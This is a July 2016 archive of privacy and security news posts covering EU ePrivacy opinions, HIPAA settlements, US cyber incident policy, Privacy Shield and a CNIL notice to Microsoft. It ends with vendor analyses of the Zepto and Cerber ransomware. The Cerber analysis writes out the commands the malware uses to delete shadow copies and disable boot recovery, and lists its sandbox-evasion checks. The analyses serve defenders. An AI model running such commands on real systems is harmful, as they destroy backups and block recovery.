Monthly Archives: July 2016

Article 29 Working Party and EDPS Release Opinions on the ePrivacy Directive

On July 25, 2016, the Article 29 Working Party (the “Working Party”) and the European Data Protection Supervisor (“EDPS”) released their respective Opinions regarding the review of Directive 2002/58/EC on privacy and electronic communications (the “ePrivacy Directive”). Both the Working Party and the EDPS stressed that new rules should complement the protections available under the EU General Data Protection Regulation (“GDPR”).

These opinions are non-binding, but nevertheless indicate how regulators will seek to interpret the existing legal framework and influence the reformation of the future legal framework on ePrivacy matters.

The main recommendations of the Working Party with regard to the review of the ePrivacy Directive include:

  • Extended scope. The scope of the ePrivacy Directive should be extended from the traditional telecom providers to cover new types of Voice over IP services, including instant messaging, webmail and messaging in social networks. In addition, the Working Party recommends clarifying the definitions of “public electronic communications network” and “electronic communications services” to reflect the infrastructure of today’s communication networks. In addition, the Working Party recommends clarifying the term “publicly accessible private communication networks” to expand the application of the confidentiality protections of the ePrivacy Directive to all publicly available networks and services such as Wi-Fi services in hotels and shops, networks offered by universities and hotspots.
  • Confidentiality. According to the Working Party, the confidentiality protections of the ePrivacy Directive should be improved to protect users against interception of the content of their communication, regardless of whether it concerns direct electronic communications between users or within a defined users group (e.g., a conference call or webcast). Furthermore, interception should be interpreted broadly to include the injection of unique identifiers. Moreover, the Working Party recommends merging the currently separate provisions on traffic and location data to create a harmonized consent requirement for the processing of metadata.
  • Consent. Given the sensitive nature of communications data, the Working Party believes that prior user consent should remain a key principle in the ePrivacy context regarding the collection of metadata, content data and tracking techniques. To ensure consistency with the GDPR, the future ePrivacy framework should clearly refer to the GDPR provisions, specifying the definition, conditions and forms of the consent. According to the Working Party, “take it or leave it” approaches that do not give users free choice regarding processing rarely meet the requirements for freely given consent. Therefore, forced consent should be prohibited (e.g., tracking by unidentified third parties for unspecified purposes and non-granular consent bundled with multiple purposes). The Working Party recommends that instead of relying on website operators to obtain consent on behalf of third parties (such as advertising and social networks), manufacturers of browsers and other software or operating systems should be encouraged to offer Do Not Track controls to allow users to withdraw consent.
  • Cookies. According to the Working Party, the cookie rules should be rephrased to be as technologically neutral as possible in order to capture tracking techniques used on smartphones and Internet of Things applications, including ‘passive tracking.’ The Working Party seeks to ensure that the rules governing the collection of information from user devices do not depend on the kind of device owned by the user nor on the technology employed by an organization, especially with respect to the use of information for marketing and market analysis purposes. The cookie consent requirements should also apply when the data is not stored on the terminal equipment, but made available through the device and processed elsewhere. The Working Party nevertheless invites the European Commission to consider circumstances in which cookie consent will not be required due to the minor impact on the rights of users, such as when anonymization techniques are used to immediately and irreversibly anonymize data during collection on the device, or on the endpoints of the network or sensors.
  • Direct marketing. The Working Party recommends updating the rules on unsolicited communications to require prior consent of the user for sending any type of unsolicited communications independent of the means (e.g., electronic mail, behavioral advertising, voice or video calls, fax, text and direct-messaging). In addition, users must be able to revoke their consent easily and free of charge, without stating a reason, via simple means that have to be indicated in each subsequent communication. The commercial purpose of the communication should be clearly identified at the beginning of the communication. According to the Working Party, the currently applicable opt-out exception for sending marketing communications to existing customers for similar products and services should be limited to a reasonable amount of marketing communications so that senders do not bombard users with an excessive number of marketing calls or messages.
  • Deletion of specific data breach notification. The ePrivacy Directive contains sector-specific breach notification requirements applicable to telecom providers and Internet service providers. To avoid duplicative notifications, the Working Party recommends simplifying the process to require the notification of supervisory authorities under the GDPR regarding all data breaches involving personal data.
  • Enforcement. The Working Party believes it should be clarified that the supervisory authorities under the GDPR will also have jurisdiction on ePrivacy matters involving personal data to ensure consistent enforcement and harmonization of sanctions.

The EDPS makes similar recommendations as the Working Party with respect to the review of the ePrivacy Directive. In particular, the EDPS recommends that:

  • the scope of the ePrivacy Directive be extended to all forms of electronic communications irrespective of network or service used;
  • the updated rules should ensure that the confidentiality of users is protected on all publicly accessible networks;
  • no communications should be subject to unlawful tracking and monitoring without freely given consent, whether by cookies, device-fingerprinting or other technological means;
  • communications should not be tracked or monitored, except with users’ freely given consent;
  • the current consent requirement for traffic and location data should be strengthened;
  • the existing rules on unsolicited communications should be updated to strengthen the consent requirements; and
  • the future ePrivacy Directive provide specific rules enhancing transparency regarding government access requests, such as a requirement for organizations to periodically issue transparency reports on the amount of the law enforcement requests they receive in aggregate form.

Read the Opinion of the Article 29 Working Party.

Read the Opinion of the EDPS.

OCR Settles Two HIPAA Cases with Public Health Centers in Oregon and Mississippi

On July 21, 2016, the U.S. Department of Health and Human Services’ Office for Civil Rights (“OCR”) entered into resolution agreements with two large public health centers, Oregon Health & Science University (“OHSU”) and the University of Mississippi Medical Center (“UMMC”), over alleged HIPAA violations.

OHSU

Following the submission of multiple breach notification reports by OHSU in 2013, OCR investigated and found “evidence of widespread vulnerabilities within OHSU’s HIPAA compliance program.” These vulnerabilities included (1) storing electronic protected health information (“ePHI”) on a cloud-based server without entering into a business associate agreement (“BAA”) with the cloud provider; (2) conducting inadequate risk analyses; and (3) failing to implement a mechanism to encrypt and decrypt ePHI.

The resolution agreement requires OHSU to pay $2.7 million to OCR and enter into a Corrective Action Plan that obligates OHSU to:

  • conduct an accurate and thorough risk assessment of the potential risks and vulnerabilities to the confidentiality, integrity and availability of ePHI held by OHSU;
  • develop a comprehensive risk management plan to address those risks and vulnerabilities identified in the risk analysis;
  • implement a mobile device management solution to encrypt all OHSU-owned and personally-owned mobile devices that access ePHI;
  • provide security awareness training to its workforce;
  • report any events of noncompliance with its HIPAA policies and procedures; and
  • submit annual compliance reports to OCR for a period of three years.

In announcing the settlement with OHSU, OCR Director Jocelyn Samuels noted that “OHSU had every opportunity to address security management processes that were insufficient.” She also stated that “[t]his settlement underscores the importance of leadership engagement and why it is so critical for the C-suite to take HIPAA compliance seriously.”

UMMC

The UMMC settlement also stemmed from a breach in 2013 that affected approximately 10,000 individuals. OCR’s investigation revealed that UMMC had failed to conduct any significant risk management activity despite being aware of certain risks and vulnerabilities to ePHI dating back to 2005. The investigation also noted that UMMC had failed to (1) implement policies and procedures to prevent, detect, contain and correct security violations; (2) implement physical safeguards for workstations that access ePHI; (3) assign a unique username or number to identify and track user identity in information systems that contain ePHI; and (4) notify each individual whose ePHI was affected by the breach.

The resolution agreement requires UMMC to pay $2.75 million to OCR and enter into a Corrective Action Plan that obligates UMMC to:

  • designate an internal monitor to review UMMC’s compliance with the Corrective Action Plan and submit reports to OCR;
  • draft an enterprise-wide risk analysis and risk management plan;
  • update its Information Security Policy to comply with the HIPAA Security Rule;
  • revise its breach notification policy;
  • develop a plan to require a unique username and/or number to track users in systems that access ePHI;
  • provide security awareness training to its workforce;
  • report any events of noncompliance with its HIPAA policies and procedures; and
  • submit annual compliance reports to OCR for a period of three years.

In announcing the settlement with UMMC, OCR Director Jocelyn Samuels stated that “[i]n addition to identifying risks and vulnerabilities to their ePHI, entities must also implement reasonable and appropriate safeguards to address them within an appropriate time frame.”

The two OCR settlements this July continue an active year by OCR in HIPAA enforcement. We wrote about prior OCR settlements in June, April and March of this year.

White House Releases New Policy on Federal Cyber Incident Response

On July 26, 2016, the White House unveiled Presidential Policy Directive PPD-41 (“PPD-41”), Subject: United States Cyber Incident Coordination, which sets forth principles for federal responses to cyber incidents approved by the National Security Council (“NCS”). Coming on the heels of several high-profile federal breaches, including the Office of Personnel Management’s loss of security clearance information and the hack of over 700,000 IRS accounts, PPD-41 is a component of President Obama’s Cybersecurity National Action Plan. PPD-41 first focuses on incident response to cyber attacks on government assets, but also outlines federal incident responses to cyber attacks on certain critical infrastructure within the private sector.

PPD-41 groups federal incident response into two broad categories, cyber incidents and significant cyber incidents. PPD-41 directs the first federal agency that detects a cyber incident, under the direction of the Department of Justice (“DOJ”) and the Department of Homeland Security (“DHS”), to “rapidly notify” relevant agencies. According to PPD-41, the federal government typically will not play a role in responding to cyber incidents involving private sector entities, beyond remaining “cognizant” of entities’ responses.

However, PPD-41 lays out a more robust response for cyber incidents that have significant impacts on an entity, national security or the broader economy, noting that such incidents require a unique approach to response efforts. To that end, PPD-41 outlines a coordinated federal response to significant cyber incidents through the use of a Cyber Unified Coordination Group (“Cyber UCG”), which is defined as a response coalition made up of relevant federal agencies and private sector partners.

In order to ensure streamlined national operational coordination by a Cyber UCG, PPD-41 appoints specific federal agencies as leading coordinators for three key components of incident response:

  • Threat Response: Activities include collecting evidence, investigative activity and identifying affected entities. PPD-41 directs that DOJ, acting through the FBI and the National Cyber Investigative Joint Task Force, be the federal lead agency for threat response activities.
  • Asset Response: Activities include offering technical support to affected entities, mitigating vulnerabilities and reducing the impact of cyber incidents. PPD-41 directs that DHS lead these efforts in a Cyber UCG, acting in coordination with the National Cybersecurity and Communications Integration Center.
  • Intelligence Support: Activities include analysis of threat trends, information sharing and mitigating threat capabilities. PPD-41 establishes the Office of the Director of National Intelligence to act as the lead federal agency for intelligence support within a Cyber UCG.

Upon formation of a Cyber UCG, PPD-41 directs that federal agencies assign appropriate senior executives, staff and resources to execute the agency’s responsibilities as part of a Cyber UCG. The Cyber UCG is intended to result in unity of effort and not to alter agency authorities or leadership, oversight or command responsibilities.

Under PPD-41, such a Cyber UCG can be formed at the direction of the NSC, the Cyber Response Group (to which PPD-41 also assigns the responsibility of leading federal policy on cyber incident response) and sector-specific agencies. However, PPD-41 also directs the formation of Cyber UCGs where a significant cyber incident “could reasonably result in catastrophic regional or national effects on public health or safety, economic security, or national security.” Notably, this builds off of President Obama’s Executive Order 13636 (“Improving Critical Infrastructure Cybersecurity”), which calls for the identification of “Critical Infrastructure at Greatest Risk” using similar criteria.

In sum, PPD-41 seeks to improve the federal government’s response to cyber incidents. Owner/operators of critical infrastructure labeled “Critical Infrastructure at Greatest Risk” under Executive Order 13636 should be aware that a significant cyber incident involving such assets could activate a Cyber UCG under PPD-41. Building early relationships with key federal agencies can help such private sector entities effectively work with a Cyber UCG in the event of cyber attack.

Lisa Sotto Interviewed on Privacy Piracy Radio Show

On July 25, 2016, Lisa Sotto, partner and head of the Global Privacy and Cybersecurity practice at Hunton & Williams LLP, was interviewed on KUCI 88.9 FM radio’s Privacy Piracy show. Lisa discussed the changing regulatory landscape, information security enforcement actions, the threat actors who attack companies’ data and how to manage the aftermath of a data breach. “There is no industry sector that is exempt [from being targeted],” Lisa says. She notes that, because “data can be sold for a monetary sum, data is now the equivalent of cash.”

Listen to the full interview.

U.S. Department of Commerce Launches Privacy Shield Website

On July 26, 2016, the U.S. Department of Commerce announced that it has launched a new website that provides individuals and companies with additional information regarding the EU-U.S. Privacy Shield Framework (“Privacy Shield”). Among other things, the website provides information about complying with, and self-certifying to, the Privacy Shield’s principles. The Department of Commerce’s website will begin accepting certifications on August 1, 2016.

EU Regulators Will Not Challenge Adequacy of Privacy Shield for at Least One Year

On July 26, 2016, Isabelle Falque-Pierrotin, the Chairwoman of the Article 29 Working Party of data protection regulators, announced that EU data protection regulators will not challenge the adequacy of the EU-U.S. Privacy Shield (“Privacy Shield”) for at least one year (i.e., until after summer 2017). The European Commission is scheduled to conduct a mandatory review of the adequacy of the Privacy Shield by May 2017.

As we recently reported, on July 12, 2016, the European Commission and the U.S. Department of Commerce announced the formal adoption of the Privacy Shield framework, composed of an Adequacy Decision and accompanying Annexes.

The Privacy Shield is designed to protect the fundamental rights of individuals whose personal data is transferred to the U.S. and ensure legal certainty for businesses with respect to transatlantic transfers of personal data.

The EU-U.S. Privacy Shield: A How-To Guide

On July 12, 2016, after months of negotiations and criticism, the EU-U.S. Privacy Shield (“Privacy Shield”) was officially adopted by the European Commission and the Department of Commerce. Similar to the Safe Harbor, companies must certify their compliance with the seven principles comprising the Privacy Shield to use the Shield as a valid data transfer mechanism. Hunton & Williams partner Lisa J. Sotto and associate Chris D. Hydak recently published an article in Law360 entitled “The EU-U.S. Privacy Shield: A How-To Guide.” In the article, Lisa and Chris detail the Privacy Shield principles, the benefits of certification, how the Shield will be enforced, and the challenges and risks associated with the future of the Privacy Shield.

Read the full article.

Infosec Writers

Got a topic you've become very knowledgeable about and would like to share your expertise? Want to add to the cumulative knowledge base of InfoSec/NetSec? You can write and upload your paper(s) to infosecwriters.com, and if it meets their criteria for suitability, have it published on their site.

http://infosecwriters.com/

CNIL Serves Formal Notice to Microsoft to Comply with French Data Protection Law

On July 20, 2016, the French Data Protection Authority (“CNIL”) announced that it issued a formal notice to Microsoft Corporation (“Microsoft”) about Windows 10, ordering Microsoft to comply with the French Data Protection Act within three months.

Background

Following the launch of Microsoft’s new operation system, Windows 10, in July 2015, the CNIL was alerted by the media and political parties that Microsoft could collect excessive personal data via Windows 10. A group composed of several EU data protection authorities was created within the Article 29 Working Party to examine the issue and conduct investigations in their relevant EU Member States. The CNIL initiated its investigation and carried out seven online inspections in April and June 2016. The CNIL also questioned Microsoft on certain points of its privacy statement.

CNIL Formal Notice

In its formal notice, the CNIL found that Windows 10 showed several breaches of the French Data Protection Act as amended, including:

  • Breach of the Data Proportionality Requirement. As a general rule, personal data must be appropriate, relevant and not excessive with respect to the purposes for which the data is collected and further processed (i.e., data proportionality). The CNIL found that Microsoft was collecting irrelevant or excessive telemetry data. According to Microsoft’s privacy statement, diagnostic and usage data are collected via Microsoft’s telemetry service, among other things, to identify troubleshooting problems and to improve Microsoft products and services. Users cannot deactivate the telemetry service but can opt to set their devices to the basic level of diagnostic and usage data. Such data is described as vital to the operation of Windows. The CNIL found that most of this data was not directly necessary for the system to operate and thus, Microsoft was collecting excessive personal data.
  • Breach of the Notice Requirement. The French Data Protection Act requires data controllers to include minimum privacy language directly on the form used to collect information. Further, the French Implementing Decree requires data controllers to provide detailed information on international data transfers (including the types of the personal data transferred, the purpose(s) of the data transfer, etc.). The CNIL found that the form for creating a Microsoft account did not contain any privacy language and that Microsoft’s privacy statement did not provide all the information required about the data transfers.
  • Breach of the Cookie Law Rules. Under the French Data Protection Act, users’ consent must be obtained before accessing or recording data in their devices. The CNIL found that Microsoft was generating a unique advertising ID that was activated by default when Windows 10 was installed, thereby allowing Windows app and third-party apps to monitor user browsing and provide targeted advertising without the user’s prior consent. The CNIL further found that 13 cookies (including advertising cookies) were placed on the user’s device when clicking on the link to Microsoft’s privacy statement. These cookies were placed without informing users in advance of (1) the purposes of the cookies, and (2) how to block them. Additionally, the CNIL also found that that Microsoft’s privacy statement was simply referring to browser settings to block cookies. Browser settings cannot be considered a valid mechanism to block cookies where the site places technical cookies that are essential for its operation and first-party cookies requiring users’ consent (as was the case here). The CNIL concluded that Microsoft was not complying with the cookie law requirements.
  • Breach of the Data Security Requirement. The French Data Protection Act also requires data controllers to take all necessary measures to ensure the security of the personal data. The CNIL observed that Windows 10 users were prompted to create a PIN for their device to authenticate themselves for all Microsoft’s online services, including access to their email and Microsoft account, which lists store purchases and the payment options used. The CNIL further observed that the PIN code could be composed of four identical figures (e.g., “0000”) and the number of attempts to enter the PIN was unlimited. According to the CNIL, this implies that user data was not secure.
  • Breach of the Registration Requirement. According to the French Data Protection Act, processing personal data for fraud prevention purposes requires the CNIL’s prior authorization. Microsoft’s privacy statement specifies that user data may be processed for these purposes. However, Microsoft did not file an authorization request for implementing the data processing, thereby infringing the French registration requirements.
  • Breach of the Cross-Border Data Transfer Restrictions. Finally, since the invalidation by the Court of Justice of the European Union of the European Commission Decision on the Safe Harbor framework, data transfers based on that framework are unlawful. Microsoft’s privacy statement still refers to Microsoft’s Safe Harbor certification, which, according to the CNIL, constitutes a breach of the cross-border data transfer restrictions.

Next Steps

The CNIL ordered Microsoft to cease its non-compliance within three months. Failure to do so within the prescribed time limit may result in a fine of up to €150,000 (under the current regime) or up to €3 million (when the French ‘Digital Republic’ law amending the French Data Protection Act becomes effective – possibly in September or October 2016). Microsoft has already announced that it will release an updated privacy statement next month referring to the EU-U.S. Privacy Shield.

Zepto Ransomware Packed into WSF Spam

ThreatTrack Labs has recently observed a surge of spam containing a zip attachment with a WSF (Windows Scripting File) to deliver Zepto ransomware. This tactic is a change from the common JavaScript and macro documents being spammed previously.

Here are actual emails featuring familiar social engineering tactics:

ransomware spam infected WSF attachment

ransomware spam infected WSF attachment

ransomware spam infected WSF attachment

The zip attachments contain the WSF.

infected WSF file

 

An Interactive Analysis with ThreatAnalyzer

To see what we’re dealing with, we turned to ThreatTrack’s malware analysis sandbox ThreatAnalyzer.

We extracted the WSF, submitted it to ThreatAnalyzer and generated the following threat analysis:

Zepto ransomware analysis

Since this is a script, we are more concerned with the call tree from WScript.exe. One notable result, encircled above, is the number of modified files. This most indicates a high likelihood that this could either be a virus or ransomware. And considering the proliferation of ransomware attacks lately, that’s our biggest concern.

There are two captured screen shots from our analysis.

Zepto ransomware analysis infection screen

Expanding the MODIFIED FILES shows this result.

ransomware modified files

The files affected are renamed with a “.zepto” filename extension.

Given the screenshot and Modified Files artifacts, we can confidently say that this is a variant of the Zepto ransomware.

The WSF Script Behavior

Selecting C:\Windows\System32\WScript.exe (3388) shows results of the behaviors done by the WSF alone.

ransomware sandbox analysis

ransomware sandbox analysis

It shows that the script created two files and made an HTTP connection to mercumaya.net.

Let’s look at the two files in the Temp folder.

This is the binary view of UL43Fok40ii file

Zepto ransomware encrypted code

This is the UL43Fok40ii.exe file.  A complete PE file format.

ransomware code processes analysis

Having only a difference of 4 bytes in size of 208,008 bytes and 208,004 bytes suggests that the file without the .exe filename extension was decrypted to form the PE executable file. Afterwards, the PE executable was run by the WSF script with the argument: “321”.

ransomware sandbox analysis

 

Expanding the Network connections.

ransomware sandbox analysis

ransomware sandbox analysis

With the com.my suffix from the resolved host, the server seems to be located in Malaysia.

The HTTP header also indicates that the Content-Length was 208,008 bytes. This is the same file size of the encrypted file.

The WSF file executed by the WScript.exe simply downloaded then decrypted a Windows PE file then executed it.

The Downloaded Executable PE file

Now we turn our focus on the behavior of the executable file UL43Fok40ii.exe.

Zepto ransomware sandbox analysis

  • Posted some info to a server somewhere in Ukraine.
  • Accessed hundreds of files.
  • Executed the default browser (Chrome was set as the default browser)
  • Deleted a file using cmd.exe

ransomware sandbox analysis

  • Connected to shares
  • Dropped the ransom instructions (_HELP_instructions.html). For every folder where a file got encrypted for ransom, a copy of the _HELP_instructions.html is created.

ransomware sandbox analysis help me

  • Created 10 threads

The data posted to the Ukraine site is encrypted. Most likely this contains the id and key used to encrypt the files.

i

TA displays the raw data in hexadecimal form. A partially converted version of the raw data is shown below:

j1

 

This malware also renamed a lot of files. This is the behavior that encrypts files while renaming the file using a GUID filename with a “.zepto” filename suffix.

k

In the manner of searching files, it primarily targets the phone book file before traversing from the root directory of the drive.

l

Also some notable files that were created. The captured screenshot is the contents of the _HELP_instructions.bmp file.

m

This malware sample attempts to move its running executable to a file in the Temp folder.

q

With Chrome set as the default browser,  the malware opens the file _HELP_instructions.html that it previously created in the Desktop.  It also, deletes the malware copy from the Temp folder probably a part of it’s clean up phase.

o

Here’s what _HELP_instructions.html looks like when opened in a browser.

p

The process call tree under Chrome.exe are most likely invoked by the browser and not part of this malware.

Prevent Ransomware

Syndicates behind today’s ransomware like Zepto are aggressively finding various ways of infiltrating businesses and government organizations alike. In this case, they attacked by using Windows Scripting Files in hopes to pass through email gateways that don’t block WSF files in attachments.

To protect your organization, deploy solutions that protect you from sophisticated and pervasive threats like ransomware, including advanced endpoint protection like VIPRE Endpoint Security, a malware behavior analysis tool like ThreatAnalyzer, and solutions to detect and disrupt active cyber attacks like ThreatSecure. And regularly back up all your critical data.

VIPRE antivirus detections for this threat include Trojan.Locky.AX and Trojan.Win32.Generic!BT.

The post Zepto Ransomware Packed into WSF Spam appeared first on ThreatTrack Security Labs Blog.

Advocate General Finds Member States May Not Breach EU Laws Over Electronic Communications Retention

On July 19, 2016, Advocate General Saugmandsgaard Oe (“Advocate General”), published his Opinion on two joined cases relating to data retention requirements in the EU, C-203/15 and C-698/15. These cases were brought following the Court of Justice for the European Union’s (“CJEU’s”) decision in the Digital Rights Ireland case, which invalidated Directive 2006/24/EC on data retention. The two cases, referred from courts in Sweden and the UK respectively, sought to establish whether a general obligation to retain data is compatible with the fundamental rights to privacy and data protection under EU law.

In his Opinion, the Advocate General stresses the need to find a balance between a nation’s need to effectively fight serious crime, such as terrorism, against individuals’ fundamental rights. The Advocate General found that a general obligation to retain data may be compatible with EU law, although any action from an EU Member State against the possibility of imposing such an obligation is subject to strict requirements. The national courts are responsible for determining whether or not such requirements are satisfied. The Advocate General set out the following interpretations of the requirements:

  • the general obligation to retain data and the accompanying guarantees must be laid down by legislation or regulatory measures;
  • the obligation must respect the essence of the right to respect for private life and the right to the protection of personal data laid down by the European Charter for Human Rights;
  • any interference with the fundamental rights should be in pursuit of an objective in the general interest (which the Advocate General opined could be satisfied only by the fight against serious crime);
  • the general obligation to retain data must be strictly necessary to the fight against serious crime; and
  • the general obligation must be proportionate.

While the Advocate General’s Opinion is not binding on the CJEU, the court’s judgments have historically tended to follow the Advocate General’s stated views.

Second Circuit Holds Microsoft Cannot Be Compelled to Turn Over Emails Stored Abroad

This post has been updated. 

On July 14, 2016, the U.S. Court of Appeals for the Second Circuit held that Microsoft Corporation (“Microsoft”) cannot be compelled to turn over customer emails stored abroad to U.S. law enforcement authorities.

As we previously reported, in April 2014 a judge in the U.S. District Court for the Southern District of New York ruled that Microsoft must release user data to U.S. law enforcement when issued a search warrant under the Stored Communications Act (“SCA”), even if the data is stored outside of the U.S. The case stems from a search warrant seeking the contents of all emails, records and other information regarding one of Microsoft’s email users. Microsoft complied with the warrant by producing “non-content” information related to the account (which is stored on U.S. servers), but refused to turn over the contents of the emails that are stored on a server in Ireland. The company argued that U.S. courts are not authorized to issue warrants for extraterritorial search and seizure of emails. The district court judge found that a search warrant for online data is unlike a conventional warrant, stating that if it were treated like a conventional warrant, the burden on the government would be substantial and law enforcement efforts would be impeded.

In reaching its decision to overturn the lower court’s ruling, the Second Circuit held that “Congress did not intend the [SCA’s] warrant provisions to apply extraterritorially…[and] the SCA does not authorize a U.S. court to issue and enforce an SCA warrant against a United States‐based service provider for the contents of a customer’s electronic communications stored on servers located outside the United States.”

UPDATE: On January 25, 2017, the U.S. Court of Appeals for the Second Circuit denied the U.S. Department of Justice’s (“DOJ’s”) request for a rehearing of the case. The DOJ might seek to appeal the decision to the U.S. Supreme Court.

Security Weekly #473 – “Blackholing Your Python”

This week on Security Weekly, Bob Stratton of Mach37 joins us. Joff will write a Python script that can download malware domain name lists from a URL, and create a DNS blackhole bind9 based configuration file on the domain names obtained. In security news, we discuss Pokemon Go, an FDIC hack, and more. Stay tuned!

Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

Attack Process

The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

  1. Target receives and opens a Word document.
  2. Macro in document is invoked to run PowerShell in hidden mode.
  3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
  4. On successful connection, the ransomware is written to the disk of the victim.
  5. PowerShell executes the ransomware.
  6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, startup.run and runonce registry entries.
  7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
  8. Files are encrypted and messages are presented to the user requesting payment.

Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

PowerShell Abuse

When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

In this case we observed the macrocode calling PowerShell to bypass execution policies – and run in hidden as well as encrypted mode – with the intention that PowerShell would download the ransomware and execute it without the knowledge of the victim.

Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

Cerber in Action

Initial payload behavior

Upon execution, the Cerber malware will check to see where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\&#60GUID&#62), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen randomly and obtained from the %WINDIR%\system32 folder.

If the malware is launched from the specific aforementioned folder and after eliminating any blacklisted filenames from an internal list, then the malware creates a renamed copy of itself to “%APPDATA%\&#60GUID&#62” using a pseudo-randomly selected name from the “system32” directory. The malware executes the malware from the new location and then cleans up after itself.

Shadow deletion

As with many other ransomware families, Cerber will bypass UAC checks, delete any volume shadow copies and disable safe boot options. Cerber accomplished this by launching the following processes using respective arguments:

Vssadmin.exe "delete shadows /all /quiet"

WMIC.exe "shadowcopy delete"

Bcdedit.exe "/set {default} recoveryenabled no"

Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures

Coercion

People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

Figure 2. A message to the victim after encryption

The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.

 

 

Figure 3. Ransom offered to victim, which is discounted for five days

Multilingual Support

As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

Figure 4.   Interface provided to the victim to pay ransom supports 12 languages

Encryption

Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as. ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

Selective Targeting

Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services such as ipinfo.io to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

The attack also checked a system's keyboard layout to further ensure it avoided infecting machines in the attackers geography: 1049—Russian, ¨ 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri, (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).

Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

Anti VM Checks

The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.

Persistence

Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

  • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
  • The “CommandProcessor” Autorun keyvalue is changed to point to the Cerber payload so that the malware will be launched each time the Windows terminal, “cmd.exe”, is launched.
  • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
  • Common persistence methods such as run and runonce key are also used.
A Solid Defense

Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections or they may not be possible based on your organization.

FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.

Conclusion

Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

